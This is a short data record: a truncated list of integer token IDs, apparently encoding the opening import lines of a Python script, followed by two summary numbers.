[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 11748, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 19798, 292, 355, 279, 67, 198, 198, 6738, 11485, 31534, 1330, 29...
2.118499
2,692